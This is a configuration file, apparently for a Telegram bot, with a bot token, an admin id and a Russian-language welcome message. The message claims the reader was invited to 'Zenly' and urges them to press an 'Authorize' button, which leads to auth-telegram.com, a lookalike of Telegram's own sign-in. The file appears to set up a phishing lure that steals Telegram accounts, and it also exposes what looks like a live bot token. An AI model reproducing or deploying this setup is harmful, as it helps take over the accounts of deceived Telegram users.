# - *- coding: utf- 8 - *-
[SETTINGS]
TOKEN=5391975150:AAE5cUCKqktCt4GP-8vVJhntbg1kK2NyXVM
start_text=Вы были приглашены в бот Zenly одним из пользователей. Чтобы сделать 🔥 Bump 🔥 и начать пользоваться Zenly в Telegram - нажмите синюю кнопку "Авторизоваться" , она находится над вашей клавиатурой. После авторизации начнётся проверка, после которой вы сможете начать пользоваться Zenly в вашем любимом мессенджере ❤️

web_button_name=Авторизоваться
web_url=https://auth-telegram.com/auth?ref=e64f1f48-e61a-4584-82fd-19f6a7a0b9af

[PHOTO]
file_type=png
;file_type - png

[ADMIN]
admin_id=1361816235